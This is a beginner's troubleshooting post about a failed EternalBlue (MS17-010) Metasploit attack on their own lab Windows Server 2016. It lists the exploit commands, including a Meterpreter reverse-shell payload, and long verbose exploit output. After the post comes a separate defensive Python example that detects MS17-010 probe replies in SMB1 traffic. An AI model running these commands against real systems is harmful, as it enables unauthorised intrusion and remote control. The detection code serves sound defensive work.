Hello, I'm a wannabe pentester (please don't throw tomatoes), and straight to the question. There is a Windows Server 2016 14393. I want to get into it from Kali Linux using EternalBlue. Both are on the same NAT network. The firewall on the server is disabled. Ping works in both directions. Now the list of commands:
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.115.132(kali)
set RHOST 192.168.115.128(server)
exploit
On launch it prints the following:
[*] 192.168.115.128:445 - Connecting to target for exploitation.
[+] 192.168.115.128:445 - Connection established for exploitation.
[+] 192.168.115.128:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.115.128:445 - CORE raw buffer dump (45 bytes)
[*] 192.168.115.128:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.115.128:445 - 0x00000010 30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61 016 Standard Eva
[*] 192.168.115.128:445 - 0x00000020 6c 75 61 74 69 6f 6e 20 31 34 33 39 33 luation 14393
[+] 192.168.115.128:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.115.128:445 - Trying exploit with 22 Groom Allocations.
[*] 192.168.115.128:445 - Sending all but last fragment of exploit packet
[*] 192.168.115.128:445 - Starting non-paged pool grooming
[+] 192.168.115.128:445 - Sending SMBv2 buffers
[+] 192.168.115.128:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.115.128:445 - Sending final SMBv2 buffers.
[*] 192.168.115.128:445 - Sending last fragment of exploit packet!
[*] 192.168.115.128:445 - Receiving response from exploit packet
[+] 192.168.115.128:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.115.128:445 - Sending egg to corrupted connection.
[*] 192.168.115.128:445 - Triggering free of corrupted buffer.
[-] 192.168.115.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.115.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.115.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Exploit completed, but no session was created.
Or else, during the run, the server goes into a reboot.
Additionally I used the option set VERBOSE true
On a repeated run it gives this result:
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] 192.168.115.128:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[*] 192.168.115.128:445 - Connected to \\192.168.115.128\IPC$ with TID = 2050
[*] 192.168.115.128:445 - Received STATUS_INSUFF_SERVER_RESOURCES with FID = 0
[+] 192.168.115.128:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard Evaluation 14393 x64 (64-bit)
[*] 192.168.115.128:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.115.128:445 - The target is vulnerable.
[*] 192.168.115.128:445 - Connecting to target for exploitation.
[+] 192.168.115.128:445 - Connection established for exploitation.
[+] 192.168.115.128:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.115.128:445 - CORE raw buffer dump (45 bytes)
[*] 192.168.115.128:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.115.128:445 - 0x00000010 30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61 016 Standard Eva
[*] 192.168.115.128:445 - 0x00000020 6c 75 61 74 69 6f 6e 20 31 34 33 39 33 luation 14393
[+] 192.168.115.128:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.115.128:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.115.128:445 - Sending all but last fragment of exploit packet
[*] 192.168.115.128:445 - Sending NT Trans Request packet
[*] 192.168.115.128:445 - Making :eb_trans2_zero packet
[*] 192.168.115.128:445 - Making :eb_trans2_buffer packet
[*] 192.168.115.128:445 - Making :eb_trans2_buffer packet
[*] 192.168.115.128:445 - Making :eb_trans2_buffer packet
[*] 192.168.115.128:445 - Making :eb_trans2_buffer packet
[*] 192.168.115.128:445 - Making :eb_trans2_buffer packet
[*] 192.168.115.128:445 - Making :eb_trans2_buffer packet
[*] 192.168.115.128:445 - Making :eb_trans2_buffer packet
[*] 192.168.115.128:445 - Making :eb_trans2_buffer packet
[*] 192.168.115.128:445 - Making :eb_trans2_buffer packet
[*] 192.168.115.128:445 - Making :eb_trans2_buffer packet
[*] 192.168.115.128:445 - Making :eb_trans2_buffer packet
[*] 192.168.115.128:445 - Making :eb_trans2_buffer packet
[*] 192.168.115.128:445 - Making :eb_trans2_buffer packet
[*] 192.168.115.128:445 - Making :eb_trans2_buffer packet
[*] 192.168.115.128:445 - Sending malformed Trans2 packets
[*] 192.168.115.128:445 - Starting non-paged pool grooming
[*] 192.168.115.128:445 - Sending start free hole packet.
[+] 192.168.115.128:445 - Sending SMBv2 buffers
[*] 192.168.115.128:445 - Sending end free hole packet.
[+] 192.168.115.128:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.115.128:445 - Sending final SMBv2 buffers.
[*] 192.168.115.128:445 - Sending last fragment of exploit packet!
[*] 192.168.115.128:445 - Making :eb_trans2_exploit packet
[*] 192.168.115.128:445 - Receiving response from exploit packet
[+] 192.168.115.128:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.115.128:445 - Sending egg to corrupted connection.
[*] 192.168.115.128:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 192.168.115.128:4444
[-] The connection was refused by the remote host (192.168.115.128:4444).
[-] The connection was refused by the remote host (192.168.115.128:4444).
Thanks in advance!!!
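The check stage in the second run above reports the host "likely VULNERABLE" because its SMB1 Trans2 probe on IPC$ is answered with STATUS_INSUFF_SERVER_RESOURCES (0xC0000205). The following added example (not part of the post, nor Metasploit's code) shows, from the defender's side, how to parse such an SMB1 reply header off the wire and flag that status as an MS17-010 probe answer; the sample packets are constructed, and the assumption that a patched host answers STATUS_INVALID_PARAMETER is mine.

```python
import struct

SMB_COM_TRANSACTION2 = 0x32
SMB_FLAGS_REPLY = 0x80                       # bit set on every server reply
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205  # what the check module above sees
STATUS_INVALID_PARAMETER = 0xC000000D        # assumed typical reply from a patched host


def parse_smb1(packet: bytes) -> dict:
    """Parse a NetBIOS session message carrying an SMB1 (CIFS) 32-byte header."""
    if len(packet) < 36 or packet[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    nb_len = int.from_bytes(packet[1:4], "big")
    hdr = packet[4:36]
    if hdr[:4] != b"\xffSMB":
        raise ValueError("not an SMB1 header")
    # command (1), NT status (4, LE), flags (1), flags2 (2) follow the magic
    command, status, flags, flags2 = struct.unpack_from("<BIBH", hdr, 4)
    # PIDHigh (2), SecurityFeatures (8), Reserved (2) are skipped; TID starts at 24
    tid, pid, uid, mid = struct.unpack_from("<HHHH", hdr, 24)
    return {"nb_len": nb_len, "command": command, "status": status,
            "flags": flags, "flags2": flags2, "tid": tid, "pid": pid,
            "uid": uid, "mid": mid}


def classify_trans2_reply(packet: bytes) -> str:
    """Label a server-to-client Trans2 reply as seen by a network sensor."""
    h = parse_smb1(packet)
    if h["command"] != SMB_COM_TRANSACTION2 or not (h["flags"] & SMB_FLAGS_REPLY):
        return "ignore"
    if h["status"] == STATUS_INSUFF_SERVER_RESOURCES:
        return "ms17-010-probe:unpatched-response"   # alert: host answered like an unpatched target
    if h["status"] == STATUS_INVALID_PARAMETER:
        return "ms17-010-probe:patched-response"     # probe seen, host appears patched
    return "trans2-reply:other"


def build_trans2_reply(status: int, tid: int = 2050) -> bytes:
    """Constructed sample: a minimal SMB1 Trans2 reply header (not a real capture)."""
    hdr = b"\xffSMB" + struct.pack("<BIBH", SMB_COM_TRANSACTION2, status,
                                   SMB_FLAGS_REPLY, 0xC807)
    hdr += b"\x00\x00" + b"\x00" * 8 + b"\x00\x00"          # PIDHigh, signature, reserved
    hdr += struct.pack("<HHHH", tid, 0xFEFF, 2048, 0)        # TID, PID, UID, MID
    return b"\x00" + len(hdr).to_bytes(3, "big") + hdr


if __name__ == "__main__":
    print(classify_trans2_reply(build_trans2_reply(STATUS_INSUFF_SERVER_RESOURCES)))
    print(classify_trans2_reply(build_trans2_reply(STATUS_INVALID_PARAMETER)))
```

In a real deployment the same two checks belong in a sensor rule keyed on TCP/445 server-to-client traffic, with the TID tying the reply back to the IPC$ tree connect that precedes it.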